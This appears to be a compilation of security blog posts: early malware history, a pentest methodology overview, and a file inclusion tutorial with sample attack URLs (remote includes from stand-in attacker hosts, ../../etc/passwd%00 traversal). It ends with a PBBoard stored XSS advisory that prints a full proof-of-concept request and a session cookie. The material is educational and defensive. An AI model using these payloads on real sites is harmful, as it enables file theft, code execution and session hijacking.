Once Freddy infected a Windows machine, every time a user launched an executable, that executable, plus a .COM file in the same directory, would become infected. The size of each infected file would grow even more, as more and more files on the same disk acquired Freddy code. So it had a devastating snowball effect that could soon crash a machine due to memory overload. In time, an infected PC wouldn’t be able to run for more than a few seconds after booting the OS. The string “Freddy Krg” could be found encrypted in infected files. So we can easily summize what the developer’s inspiration was. A Concept is Enough to Prove My Point Concept was the first really significant Macro virus, discovered in July 1995. It coincided with Microsoft Word surpassing WordPerfect in word processor market dominance. MS Word 6.0 and MS Word 95 were affected. Macros made life for frequent Word users, like my late novelist father, a lot easier. But macro creation in those versions of Word wasn’t very secure. It’s easy to blame Microsoft developers for having a lax attitude toward security. But macros were popular in WordPerfect as well, which Microsoft didn’t develop. Even antivirus vendors, at the time, were unprepared for macro viruses. Concept was the first macro virus that made them really take notice, and it revolutionized how they developed malware signatures. Concept was also notable as the first significant virus to spread via email. As a large percentage of mid-1990s email users were using AOL, the sound of “you’ve got mail” was often the harbinger of doom! After opening an infected Word document, Concept would go on to infect the NORMAL.DOT template, and then other templates as well. The macros that Concept contained were AAAZAO, AAAZFS, AutoOpen, FileSaveAs, and PayLoad. PayLoad was especially interesting. Its name was a misnomer, because it was no payload at all. It just contained this text: Point proven? 
The best case scenario would be if a user didn’t have important documents that used infected templates. Then, they could simply backup those documents, then uninstall and reinstall Word. It was useful that people usually had factory created install floppies and CDs those days. Concept infected more machines than any other malware into the late 1990s. Melissa Concept’s destructive success paved the way for the Melissa virus, which was the second malware to spread to a significant extent via email. Although email was its primary vector, it was initially discovered in the alt.sex USENET group, in the spring of 1999. It was first found in a file that supposedly contained passwords for 80 pornographic websites. But even when it spread through USENET, once it infected a user’s machine, it would target email clients, namely Microsoft Outlook 97 and 98. A user’s inbox would quickly flood with infected email, and send infected emails to addresses in a user’s address book. Some users were so scared of Melissa that they’d disconnect their PCs from the Internet entirely. It’s a shame, because reinstalling Outlook probably would have done the trick, as would running a malware scan once antivirus vendors had a signature for it. Considering the erotic theme of the virus, it didn’t come as much of a surprise that Melissa was named after a stripper. An investigation led by the FBI found Melissa’s creator later that year. It was New Jersey resident David L. Smith. On December 10th, 1999, he was sentenced to ten years of prison. But Mr. Smith only served twenty months, so he was released just as the 21st century started. Which segues nicely into my next article. 
Because although the Y2K bug was what got ordinary people into a panic, what they really should have worried about was ILOVEYOU…

References

- Trend Micro Threat Encyclopedia: Leandro
- Panda Security Virus Encyclopedia: Leandro
- ESET Threat Encyclopedia: Leandro
- McAfee Labs Threat Center: Leandro
- F-Secure: Freddy, http://www.f-secure.com/v-descs/freddy.shtml
- VSUM: Freddy Virus
- The Virus Encyclopedia: Concept
- Dr. Nikolai Bezroukov: Concept virus
- CERT: Melissa Macro Virus, https://www.cert.org/historical/advisories/CA-1999-04.cfm
- Wired.com: March 26, 1999: 'Melissa' Wreaks Havoc on Net
- HowStuffWorks: 10 Worst Computer Viruses of All Time, Worst Computer Virus 10: Melissa

Source
8. In my previous article, I told the story of the very first worms and viruses. Interestingly, a groundbreaking mathematician, John von Neumann, and a science fiction novelist, John Brunner, conceptualized them before anyone ever coded them. We often see this sort of thing in the world of science and technology. One of the most frequently cited examples is how Star Trek creator Gene Roddenberry predicted smartphones and tablets, and the Enterprise crews in the original series and The Next Generation used very similar looking and behaving devices accordingly. People in science, technology and academia used computers and the Internet decades before ordinary people. The advent of PCs, Berners-Lee’s “World Wide Web,” and ARM-based mobile devices, in that order, brought computing and computer networking into everyone’s lives.

There are two key differences between the events in my first article, and the events in this one. In the first article, pretty much only people in STEM were using computers, ARPAnet and the Internet. So, the harm done by the very first generation of malware would only affect niche groups of people. The second key difference is that the first generation of malware was all experimental rather than malicious in intent. An understanding of the history of hacker culture will demonstrate that computer programmers and technicians, especially the earliest ones, were powerfully driven by the pursuit of knowledge. I have a strong feeling that some of the strings in the earliest malware, such as “I’m the Creeper, catch me if you can!” and the copyright messages in the Brain series of viruses, were intended to be playful with other people in their field. Insider jokes, if you will.

As the late 1980s led into the 1990s, it became increasingly common to see microcomputers not only in offices, but in households as well. I remember being marveled by all the time I spent playing with Commodore 64s when I was a little girl. They really were a big deal back then.
Then in late 1992, my family got a 486 running Windows 3.1, and I was probably the very first kid in school with Internet access at home. Even at that young age, I could see how these technologies would be radically changing people’s lives. The “early adopter” status of my childhood household likely played a major role in how I grew up to be an IT security researcher. So it’s worth noting that the second generation of malware, the focus of this article, was probably the first to affect doctor’s offices, receptionists, people filing their income taxes from home, and little girls who felt compelled to download Apogee games from a BBS. (Thanks, Dad!)

Look Ma! No Permissions!

Microsoft Windows 3.1 was a major factor in getting personal computers into households and offices in the early 1990s, even though Commodore’s Amiga platform dominated Europe. But until Windows XP was released in 2001, on the client side, Windows was simply a GUI for MS-DOS. That meant that its partition would be formatted with some version of FAT (File Allocation Table) or another. All versions of FAT lack support for multiuser operating systems, and consequently lack any sort of file or folder level permissions. Boot up the machine, and you have full access to everything, no passwords or cracking necessary.

What’s especially concerning is that Windows 3.1, 95 and 98 were the first operating systems millions of people around the world used to access the Internet. Although malware can easily be transmitted via removable media, such as floppy disks and optical discs, the Internet opened up the largest vector for malware in computing history. ARPAnet started in 1969, and the modern Internet, complete with commercial ISPs, started in the late 1980s. Well, when most of us were using MS-DOS based Windows operating systems to access the Internet in the late 1980s and the 1990s, we were opening up our PCs to a massive malware source with no user account or file system protections whatsoever.
If an executable file, regardless of where it came from, launched on our PCs, it wouldn’t even have to struggle in any way to wreak havoc. When there are no permissions, everything is automatically permitted.

By 1989, Windows 2.1 and MS-DOS 4.01 were Microsoft’s most current x86 operating systems. OS/2 only ran on PS/2 hardware. Although IBM’s PS/2 microcomputers used x86, they never commercially took off like “IBM PC compatible” machines did. Though, we still see a remnant of PS/2 on a lot of our PCs even today, our PS/2 keyboard and mouse ports. Windows 1.x, 2.0, and MS-DOS 3.3 and older versions were still in frequent use. That was the environment we were in, in the world of Microsoft computing, when the first malware to have a significant impact on that platform was discovered.

Ghostball

Icelandic computer whiz Friðrik Skúlason discovered the Ghostball virus in October 1989. It evolved from Vienna. The first Vienna virus was discovered in April 1988 by Franz Swoboda, and eventually there were hundreds of variants of it. (Skúlason went on to found antivirus firm F-Prot in 1993.) Ghostball, like Vienna, was a .COM executable that targeted other .COM executables in MS-DOS based operating systems. So all versions of MS-DOS and client Windows were vulnerable. By changing the time stamp of files to 62 seconds (which would not be converted to 1:02), the whole OS would crash, and a complete disk reformatting and OS reinstallation was usually necessary. It would most commonly spread via infected floppy disks, but it spread through the Internet as well. If household Internet use was even at 1997 levels, Ghostball and other Vienna variants could’ve done a lot more damage than they did. Still, at least hundreds of thousands of Microsoft-based PCs were affected, with many millions of dollars worth of hardware and data lost.
Why Microsoft didn’t respond by launching a multiuser operating system, like UNIX and other common OSes have been using since at least the 1970s, I really don’t know. It was a terrible oversight, to say the least, especially considering Microsoft’s grip on OEMs.

Michelangelo

Italian Renaissance artist Michelangelo was born on March 6th, 1475. Back in 1991, the Michelangelo I was familiar with was the orange-masked Ninja Turtle. In February of that year, the Michelangelo virus was discovered, in either Australia or New Zealand. It was named Michelangelo because it was a boot sector “time bomb” that was coded to launch from its dormant state on his 517th birthday — March 6th, 1992. It targeted all DOS based operating systems, including all versions of Windows at the time. If a floppy disk or HDD was multiboot with a non-DOS operating system, the non-DOS operating system would still be affected because of the shared MBR.

One would’ve thought that it being discovered in February 1991 would’ve given the computing world plenty of time to get rid of it before March 6th, 1992. But alas, by January 1992, it was discovered that many products, including Intel’s LANSpool print spooler, were shipped with it. Oops! Many people in the know, especially in datacenters and institutional settings, were able to rid their machines of it before Michelangelo’s 517th birthday. But antivirus programs were unheard of by most people using DOS-based PCs in offices and households. Thankfully, many of them still heard news reports, warning them to either set their BIOS clocks to March 7th, or to leave their PCs turned off on March 6th. McAfee founder John McAfee claimed millions of PCs were infected. Other reports said only hundreds of PCs were. Especially considering Mr. McAfee’s personal problems as of 2014, I don’t think we’ll ever be certain of the exact number.
The First Spambots

Before Sir Tim Berners-Lee’s “World Wide Web” really took off later in the 1990s, many early adopters of Internet use in offices and homes in the late 1980s and early 1990s were using email, BBS, USENET and IRC. In the early 1990s, my husband Sean Rooney was an IT security expert for the Canadian government. He could imagine spambot rootkits, in various malware varieties, taking off as more and more people started using various services on the Internet. He did, in his words, a “live-fire demonstration” of spambot malware. He tells me no one took him seriously. A few years later, by around 1996, spambot malware was seen “in the wild” for the first time.

In my next article, I’ll explain the major malware events in the rest of the 1990s. That’s when things started to get really interesting…

References

- The Virus Encyclopedia: Ghostballs
- The Virus Encyclopedia: Vienna
- Securelist: Virus.Multi.Ghostball.2351.a
- Michelangelo Madness (IBM Research): https://web.archive.org/web/20080309235614/http://www.research.ibm.com/antivirus/SciPapers/White/VB95/vb95.distrib-node7.html
- F-Prot Antivirus Virus Information: Michelangelo

Source
9. These days, malware is an everyday concern, even among ordinary end users. A countless amount of money is lost every year worldwide due to malware, possibly in the hundreds of billions, but it’s difficult to accurately quantify. The money lost has causes ranging from lost hours of office productivity, to financial malware like what hit Target, to hardware that needs to be replaced due to infected firmware. What might amaze you is that malware has existed since at least 1971, and has been theorized as early as 1949. For the record, Microsoft didn’t exist until 1975. And it all started so innocently…

“Self-Reproducing Automata”

John von Neumann was a revolutionary Hungarian-born mathematician who immigrated to the United States in 1933. In 1948, von Neumann started to talk about “cellular automata,” a complex mathematical model for elementary biological functions. By 1949, those ideas evolved into his series of lectures on “self-reproducing automata,” given at the University of Illinois. Arthur W. Burks compiled those 1949 lectures into a paper that was first published in 1966. Von Neumann’s theories were astoundingly ahead of his time. His “cellular automata” ideas applied to microbes, such as biological viruses. From there, partly based on his experience with ENIAC, he imagined “self-reproducing automata” that could be an entity of those brand new “computing machines.”

“I’m the Creeper. Catch me if you can!”

Computers made by Digital Equipment Corporation played a crucial role in how computing evolved from the 1950s to the 1970s. MIT (the Massachusetts Institute of Technology) got their first PDP series computers in the 1950s. Timesharing programs had to be used so that MIT’s very first computer science students and professors could experiment with them. Some of the earliest breakthroughs in computer programming started there, back when it was done with punch cards. Elsewhere in Cambridge, Massachusetts, in 1971, Bob Thomas was a computer programmer.
He worked on a timesharing program called TENEX, which ran on a PDP-10. Thomas wanted to see if a self-replicating program could be written. His machine was connected to ARPAnet, the very first packet-switched network, which was the father of the Internet. His program was called Creeper. In Thomas’ words, he was disappointed because it “didn’t install multiple instances of itself on several targets.” But Creeper spread through ARPAnet, nonetheless. Affected machines would print at the command line, “I’m the Creeper. Catch me if you can!” So, the string displayed on ARPAnet connected computers, even if it didn’t reproduce. Many computer scientists consider Creeper to be the very first computer virus. In fact, it wasn’t long until the very first antivirus program was created, specifically to remove Creeper… It was called Reaper.

The First Worm

In 1975, science fiction writer John Brunner theorized computer worms in The Shockwave Rider. In 1978, John Shock and Jon Hepps worked at the Xerox Palo Alto Research Center. I couldn’t verify whether or not they had read Brunner’s novel. It’s likely that they did, though, because they wrote what many consider to be the very first computer worm. They wrote five different versions, all designed to improve computer efficiency by exploring a network to find underused processors. But a bug in their programs caused computers to crash. Oops!

Brain

In 1986 in Pakistan, Basit Farooq Alvi and his brother Amjad Farooq Alvi were computer programmers. Some computer scientists consider their program, Brain, to be the very first computer virus, because Thomas’ Creeper didn’t self-replicate. Brain was an innocent experiment and nothing more. It spread via 5 1/4 inch floppies only, targeting the boot sector in PC-DOS and IBM-DOS based machines. Like Shock and Hepps’ worm, the Alvi brothers wrote different versions of Brain.
Brain was relatively benign, because it basically just contained the code to self-replicate and copyrighted messages such as these:

    Welcome to the Dungeon (c) 1986 Basit & Amjad (pvt) Ltd.
    BRAIN COMPUTER SERVICES
    730 NIZAB BLOCK ALLAMA IQBAL TOWN LAHORE-PAKISTAN
    PHONE :430791,443248,280530.
    Beware of this VIRUS…. Contact us for vaccination………… $#@%$@!!

    Welcome to the Dungeon (c) 1986 Brain & Amjads (pvt) Ltd.
    VIRUS_SHOE RECORD v9.0
    Dedicated to the dynamic memories of millions of virus who are no longer with us today - Thanks GOODNESS!!
    BEWARE OF THE er..VIRUS :This program is catching program follows after these messeges….. $#@%$@!!

It seemed that the different versions of Brain really didn’t get people’s attention until 1988.

Morris’ Worm

Robert Morris was a doctoral student at Cornell University. On November 2nd, 1988, his worm was released. Like in Creeper versus Brain, some computer scientists consider Morris’ program to be the first worm, instead of Shock and Hepps’, a decade prior. But like in the other programs I’ve mentioned, the intent was experimental, not malicious. What was novel about Morris’ worm is that it did spread through the modern Internet, as it existed in the late 1980s. But like Shock and Hepps’ worm, a bug in Morris’ worm caused it to behave in a harmful way not intended by its creator.

Five days later, on November 7th, Bob Page of the University of Lowell wrote:

Page was likely the first computer scientist to properly describe the difference between a worm and a virus. Within 24 hours of the Internet debut of Morris’ worm, it infected approximately 5,000 computers. The United States General Accounting Office estimated that between $100,000 and $10,000,000 worth of productivity was lost, due to computers being unable to access the Internet.

The earliest viruses and worms were simply experiments with unintended consequences. But by the 1990s, personal computing exploded.
Soon, nearly all offices and a large percentage of households had PCs. That coincided with the first true malware, programs with actual malicious intent. That was concurrent with personal computers and the Internet becoming a part of the everyday lives of ordinary people. I’ll explore that in my next article. Stay tuned!

References

- Theory of Self-Replicating Automata, John von Neumann, compiled by Arthur W. Burks, University of Illinois Press
- Time Magazine: John von Neumann
- Computer Viruses: From Theory to Applications, Eric Filiol, Springer
- Discovery News: First Computer Virus, Creeper, Was No Bug
- Computerworld: A short history of hacks, worms, and cyberterror, http://www.computerworld.com/s/article/9131924/A_short_history_of_hacks_worms_and_cyberterror
- The Internet Worm… Don’t Get Hooked!
- The history of worm like programs, https://snowplow.org/tom/worm/history.html
- F-Secure: About Brain
- Privacy PC: The History and Evolution of Computer Viruses: 1986-1991
- braininf.vir, http://www.textfiles.com/virus/braininf.vir
- Mental Floss: Going Viral: How Two Pakistani Brothers Created the First PC Virus
- A Report on the Internet Worm, Bob Page, http://ftp.cerias.purdue.edu/pub/doc/morris_worm/worm.paper

Source
10. Establishing a penetration testing methodology is becoming increasingly important when considering data security in web applications. The more we come to rely on networked communication and cloud-based data systems, the more we leave ourselves vulnerable to potentially damaging cyber attacks by outside parties. While designing and safeguarding secured systems has become standard, how can you be certain these systems work? The answer lies in building a comprehensive penetration testing methodology to protect your information assets.

What is Penetration Testing?

Think of a penetration testing methodology—or “pentesting” for short—as a controlled cyber attack during which your best defenses are put to the test and exploited to determine the extent of vulnerabilities in your web applications. Essentially, designing and implementing a penetration testing methodology allows you to:

- Hack your own system in a proactive, authorized environment, focusing on elements such as IT infrastructure, OS vulnerabilities, application issues and user and configuration errors;
- Analyze and validate both system defenses and user adherence to system protocols; and
- Assess potential attack vectors such as web applications, wireless networks and devices and servers.

Unfortunately, no data is safe 100 percent of the time. But an effective penetration testing methodology can do wonders for eliminating unnecessary vulnerabilities.

What Are the Benefits of a Penetration Testing Methodology?

The stakes are high for data security. With an effective penetration testing methodology, you can:

- Identify vulnerabilities that scanning software cannot;
- Not only test those vulnerabilities, but also determine how prepared network defenders are to both detect and respond to attacks in a timely manner;
- Determine the potential magnitude of a successful attack; and
- Ensure all compliance protocols for data security are being met (a consideration especially important in the payments industry).
Another benefit of taking your penetration testing methodology seriously is its potential effect on internal culture. When organizational leadership demonstrates a clear commitment to data security, it reinforces its importance to employees, who will then be encouraged to follow user-end protocols to the best of their abilities.

How Often Should a Penetration Testing Methodology Be Performed?

An effective penetration testing methodology is executed regularly. As the general wisdom goes, it’s better to be proactive and strengthen your web applications’ defenses now than to wait until you’ve already suffered an attack, losing valuable data in the process. In planning your penetration testing methodology, consider your industry. Not everyone is going to have the same security needs, but it’s your company’s responsibility to make sure confidential information stays confidential. Your organization should deploy its penetration testing methodology regularly, but especially when any of the following occurs:

- Regulations specific to your industry mandate it. For the payments industry, for example, this can be a quarterly requirement. In other sectors, pentests might only be an annual requirement.
- Any alterations to network infrastructure or web applications (internal or external). This could entail upgrades, modifications, security patches, new additions or total overhauls.
- Policies change. This is especially common on the end user side of the equation. Policy changes affect the nature of the user’s interaction with the web application, which could create new challenges.
- Your organization moves or adds a new location. This includes remote employees, who will be accessing web applications through their ISP rather than your organization’s secure network.

Finally, when designing your penetration testing methodology, err on the side of caution. If you think you may need a pentest, you probably do. Pentesting may not be free, but the cost is preferable to a data breach.
Building an Effective Penetration Testing Methodology

In the previous decade, although support was building for establishing a more widely practiced penetration testing methodology, no standard materialized until 2010 with the introduction of the Penetration Testing Execution Standard (PTES). In the current version of the standard, PTES is divided into seven main sections:

- Pre-engagement Interactions
- Intelligence Gathering
- Threat Modeling
- Vulnerability Analysis
- Exploitation
- Post Exploitation
- Reporting

These elements can be considered the fundamental elements of any penetration testing methodology. We will explore each of these points in the following sections.

Pre-Engagement Interactions

When building your penetration testing methodology, remember that pentesting requires a lot of trust. You will want to find a provider that is both experienced and familiar with the particular needs of your business. Remember, you’re essentially asking your provider to hack your system, so some ground rules should be established first:

- What is the Scope? Do you want a particular area of your business targeted, or your business in general? What (and who) is off limits?
- What Is the Schedule? You still have a business to run, so it’s important to establish during which hours the pentest is to be performed. The overall timeline of the pentest should be established as an essential element of your penetration testing methodology.
- Blackbox or Whitebox? In a whitebox test, the pentester is given baseline access or information to begin and is then charged with exploiting any weaknesses from that position. In a blackbox test, the pentester begins with nothing, just like an outside attacker.
- Who Are the Contacts? It’s important that communication channels be established between all involved parties, as lapses in communication could have a variety of unintended consequences.
As the foundation of your penetration testing methodology, pre-engagement interactions should be considered very carefully.

Intelligence Gathering

In this phase of your penetration testing methodology, your provider begins the preliminary steps of planning their attack. In a properly planned pentest, the provider will have a clear idea of what is off limits and what is fair game. Understand that your provider is not doing their job if they’re not turning over every leaf looking for information about your business, its employees, its assets and its liabilities. As such, the time spent on this step of the penetration testing methodology can be quite extensive. Again, remember that establishing ground rules is important in your penetration testing methodology. Providers (and the actual hackers) are accustomed to discovering information however they can—even if that means searching through the company garbage.

Threat Modeling

Once relevant documentation has been gathered, the next step of the penetration testing methodology is to use that information to build a complete profile of your company and its assets. Once this is established, target primary and secondary assets will be determined and further scrutinized. Assets could entail a variety of different elements, including organizational data (e.g., policies, procedures, trade secrets), employee and customer data and “human assets”—high-level employees that could be exploited in a manner of ways. In a good penetration testing methodology, the provider won’t be biased in what assets they’re seeking out unless they are instructed to. Otherwise, they will work to identify those with the highest value.

Vulnerability Analysis

With the target assets established, the provider will then work to determine the best entry point to exploit those assets. A good penetration testing methodology will provide strict guidelines on project scope to ensure the client’s desired outcome is met.
Sometimes this analysis can be a no-limits effort to uncover all potential vulnerabilities. In other cases, the provider will be asked to target a specific set of potential trouble spots. In a thorough penetration testing methodology, the extent of the vulnerability is then assessed, including the level of weakness and the sensitivity of the information it might expose.

Exploitation & Post-Exploitation

The next step in the penetration testing methodology is the attack itself. Just as in a real-world data breach, a properly executed exploitation can happen very quickly. Once the provider has gained access to your systems, they will not only continue working to avoid detection, but also attempt a strategy known as “privilege escalation” to gain greater access to the system, as well as additional potential assets. As the penetration testing methodology progresses to post-exploitation after the target has been achieved, the provider will assess the value of the compromised machine or entry point and determine whether it could be further exploited for later use.

Reporting

Clearly, a thorough penetration testing methodology involves a great deal of work in data collection, analysis and exploitation. But how will the provider report on this information so that your organization can turn it into actionable solutions? Here are some considerations:

- Get Specifics: High-level recommendations may provide a basic context for the problems with your web applications, but they aren’t always very helpful to the people charged with implementation.
- Walk-Throughs: Nothing beats learning through experience. Providers should be prepared to show relevant employees and specialists exactly what they did—and also how difficult it was to accomplish.
- Risk Level: Naturally, the more challenging an attack is to pull off, the harder it will be for others to do so.
Providers should include a detailed report on the risk level of the vulnerabilities they encountered, as well as an assessment of the potential business impact if they are exploited. Finally, don’t be afraid to ask questions of your provider. A good penetration testing methodology, after all, is all about being as informed as possible. Source
11. A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files available on the web server or to execute malicious files on the web server by making use of the ‘include’ functionality. This vulnerability is mainly due to a bad input validation mechanism, wherein the user’s input is passed to the file include commands without proper validation. The impact of this vulnerability can lead to malicious code execution on the server or reveal data present in sensitive files, etc.

‘Include’ functionality

Before we get into the details of this vulnerability, let us understand briefly the functioning of an “include” statement. In simple words, the include command takes all the content present in the specified file and copies it into the file that contains the include statement. File include methods are used to avoid re-coding and to obtain reusability. Developers may also use include statements to include the data common to most of the files in the application. The most common usage of the include statement is for footers, headers, menu files, etc. The below example explains the basic usage of the include functionality. Consider a menu page as follows:

menu.php:

<?php
echo '<a href="/home.asp">HOME</a> <a href="/details.asp">DETAILS</a> <a href="/contact.asp">CONTACT US</a>';
?>

The menu page can be included in all the pages throughout the application just by using the include statement as shown below:

abc.html:

<html>
<body>
<div class="menu"><?php include 'menu.php'; ?></div>
<p>WELCOME</p>
</body>
</html>

Now, the “menu.php” file gets included in the abc.html file, and whenever the “abc.html” file is accessed, the code present in the “menu.php” file is copied to the “abc.html” file and it is executed. As the functioning of the include statement is now clear, let us proceed to the file inclusion vulnerability.
Going further, we shall deal with the file inclusion vulnerability in two different categories, based on whether the file is a remotely hosted file or a local file available on the web server:

- Remote file inclusion
- Local file inclusion

Remote file inclusion

RFI allows an attacker to include and execute a remotely hosted file using a script by including it in the attack page. The attacker can use RFI to run a malicious code either on the client side or on the server. The impact of this attack can vary from temporary theft of session tokens or data when the target is the client, to complete compromise of the system when the target is the application server.

Remote file inclusion in PHP

PHP is highly vulnerable to RFI attacks due to extensive usage of file include commands and due to default server configurations. To start with, first we need to find a location where a remote file is included in the application based on the user input. The user input is taken by the include function in PHP, and without proper validation of the input, the target site executes whatever input is provided in the vulnerable parameter. One of the vulnerable locations can be as follows, where the value of the “testfile” parameter is supplied by the user:

www.victim_site.com/abc.php?testfile=example

The vulnerable PHP code is as follows:

$test = $_REQUEST["testfile"];
include($test . ".php");

In the above code, the “testfile” parameter is taken from the request, and it is a user supplied value. The code takes in the “testfile” value and directly includes it in the PHP file. Following is one of the possible attack vectors for the above mentioned vulnerable PHP code:

www.victim_site.com/abc.php?test=http://www.attacker_site.com/attack_page

The file “attack_page” is now included into the vulnerable include page available on the server and it gets executed whenever the “abc.php” page is accessed or executed.
The attacker can carve malicious code in this “attack_page” and can perform malicious activities.

Remote file inclusion in JSP

Consider a scenario where a JSP page uses the “c:import” tag as follows to import a user supplied remote file in the current JSP page via an input parameter “test”.

<c:import url='<%= request.getParameter("test") %>' />

The following vector can be one of the attack vectors for the above code:

www.victim_site.com/abc.jsp?test=http://www.attackersite.com/stealingcookie.js

The malicious script present in “stealingcookie.js”, which is available on a remote host and controlled by the attacker, is now imported into the victim site.

Local file inclusion

The local file inclusion vulnerability is a process of including the local files available on the server. This vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker may also make use of directory traversal characters and retrieve sensitive files available in other directories.

Local file inclusion in PHP

Consider an example as follows where we can apply this attack.

http://victim_site/abc.php?file=userinput.txt

The value of the “file” parameter is taken into the following PHP code, and the file is included:

<?php
...
include $_REQUEST['file'];
...
?>

Now, an attacker can give malicious input in the “file” parameter which might retrieve unauthorized files present in the same directory, or he may use directory traversal characters like “../” to move to other directories. For example, an attacker can retrieve logs by supplying the input as “/apache/logs/error.log” or “/apache/logs/access.log”, or he can gather user credentials by supplying the input as “../../etc/passwd” in a UNIX like system.
In special cases where a file extension is a default type which is added to the user input during file inclusion, the best way to avoid the default extension to be added is by using null byte terminator ” %00?. The script that enforces the file extension may be secure, but the user input given to it by adding a “%00? null byte at the end of the URL can be used to perform malicious activity by accessing any file type. Suppose that the input given is taken by the following code and the default extension being set is “.php”. <?php “include/”.include($_GET['testfile'].”.php”); ?> Now if an attacker wants to access a file which is not of type “txt”, the attacker can use a %00 (null byte character) after the filename. Therefore an attack vector for the above code can be as follows, which will retrieve the password file available on a UNIX like web server. http://victim_site/abc.php?testfile=../../../../etc/passwd%00 Local file inclusion in JSP: Assume that the following URL is requested in the application and the parameter “test” is taken as an input in the include statement:www.victim_site.com/abc.jsp?test=xyz.jspThe value of the test parameter is passed to the include statement present in the following code: … <jsp:include page=”<%= (String)request.getParameter(”test”)%>”> … An attack vector for the above code can be as follows where in a valid database file can be given as an input and due to the local file inclusion vulnerability present in the application, the database file is included in the JSP page:www.victim_site.com/abc.jsp?test=/WEB-INF/database/passwordDB RemediationAs the main cause for such vulnerabilities is improper input validation, the remediation suggestions for file inclusion mainly revolves around sanitizing the input received. Accept only characters and numbers for file names (A-Z 0-9). Blacklist all the special characters which are not of any use in a filename. 
Limit the API to allow inclusion of files only from one allowed directory so that directory traversal can also be avoided. From the above information we can conclude that the file inclusion attacks can be at times more harmful than SQL injection, etc — therefore there is a great need to remediate such vulnerabilities. And proper input validation is the only key to avoid such vulnerabilities. References: 1. https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion 2. https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion 3. Remote File Inclusion Tutorial | www.SecurityXploded.com Source
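From the defender's side, the three attack shapes described in the post (traversal with "../", a trailing %00 null byte, and a parameter pointing at a remote URL) are easy to spot in a web server access log. The script below is an added example, not part of the original post; its log lines are constructed for the demo and the client addresses are documentation addresses, not real hosts.

```shell
#!/bin/sh
# Added example, not from the original post: scan web server access log lines
# for the file inclusion indicators described above (directory traversal "../",
# a trailing %00 null byte, and a parameter whose value is a remote URL).
# SAMPLE_LOG below is constructed for the demo; the addresses are documentation
# addresses, not real clients.

# flag_inclusion_attempts   (reads access log lines on stdin)
# Prints "TAG<TAB>original line" for each suspicious request.
# Returns 0 when at least one request was flagged, 1 when none were.
flag_inclusion_attempts() {
    found=1
    while IFS= read -r line; do
        # The request line sits between the first pair of double quotes;
        # lower-case it so %2E and %2e, HTTP and http, are treated alike.
        request=$(printf '%s\n' "$line" | cut -d'"' -f2 | tr 'A-Z' 'a-z')
        tag=""
        case $request in
            *%00*|*%2500*)                                     tag="NULLBYTE" ;;
            *../*|*%2e%2e%2f*|*..%2f*|*%2e%2e/*)               tag="TRAVERSAL" ;;
            *=/etc/passwd*)                                    tag="ABSOLUTE_PATH" ;;
            *=http://*|*=https://*|*=ftp://*|*=http%3a%2f%2f*) tag="REMOTE_URL" ;;
        esac
        if [ -n "$tag" ]; then
            printf '%s\t%s\n' "$tag" "$line"
            found=0
        fi
    done
    return $found
}

# Constructed sample in Apache combined-log style: one benign request, the
# three attack patterns from the post, then another benign request.
SAMPLE_LOG='203.0.113.10 - - [07/Dec/2014:10:01:02 +0000] "GET /abc.php?testfile=example HTTP/1.1" 200 512
203.0.113.11 - - [07/Dec/2014:10:01:05 +0000] "GET /abc.php?file=../../etc/passwd HTTP/1.1" 200 1833
203.0.113.12 - - [07/Dec/2014:10:01:09 +0000] "GET /abc.php?testfile=../../../../etc/passwd%00 HTTP/1.1" 200 1833
203.0.113.13 - - [07/Dec/2014:10:01:12 +0000] "GET /abc.php?test=http://www.attacker_site.com/attack_page HTTP/1.1" 200 77
203.0.113.14 - - [07/Dec/2014:10:01:20 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048'

# Demo run; on a real server: flag_inclusion_attempts < /var/log/apache2/access.log
if ! printf '%s\n' "$SAMPLE_LOG" | flag_inclusion_attempts; then
    echo "No file inclusion indicators found."
fi
```

A hit only means the request was attempted; whether it succeeded is decided by the application's validation (the allowlist and single-directory rule from the remediation list), so flagged lines are a prompt to check the response size and status, not proof of compromise.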
  12. ##############################################################################
# Exploit Title : PBBoard CMS Stored xss vulnerability
# Author : Manish Kishan Tanwar
# Vendor : http://www.pbboard.info/
# version affected: all
# Date : 7/12/2014
# Discovered @ : INDISHELL Lab
# Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email : manish.1046@gmail.com
##############################################################################

////////////////////////
/// Overview:
////////////////////////
PBBoard is an interactive forum management program, Dialogic free classified software, free and open source.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
A stored XSS vulnerability exists in the "send private message" module: a user can send an XSS-crafted private message to another user, and when the receiver opens the message the XSS payload will execute.

//////////////////////////////
/// Proof of Concept: -
//////////////////////////////
Go to "inbox", click "compose message", type username, title and message body, intercept the request and change the content of the "text" parameter with the XSS payload. When the receiver opens the message, the XSS payload will execute.

Proof image:- http://oi57.tinypic.com/112d5cx.jpg

//////////////////////
///Demo POC Request///
//////////////////////
POST /PBBoard_v3.0.1/index.php?page=pm_send&send=1&start=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/PBBoard_v3.0.1/index.php?page=pm_send&send=1&index=1&username=ica
Cookie: PowerBB_lastvisit=1417951132; PowerBB_username=ica; PowerBB_password=8a2d334536b2f4146af8cf46acd85110; security_level=0;PHPSESSID=thouojqch98pigioioepn8n2h1
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147872036312473
Content-Length: 670

-----------------------------147872036312473
Content-Disposition: form-data; name="to[]"

ica
-----------------------------147872036312473
Content-Disposition: form-data; name="title"

hi
-----------------------------147872036312473
Content-Disposition: form-data; name="text"

hii</div><font color=red><body onload="prompt( String.fromCharCode(120,115,115,32,116,101,115,116));">//
-----------------------------147872036312473
Content-Disposition: form-data; name="icon"

look/images/icons/i1.gif
-----------------------------147872036312473
Content-Disposition: form-data; name="insert"

Save
-----------------------------147872036312473--

--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
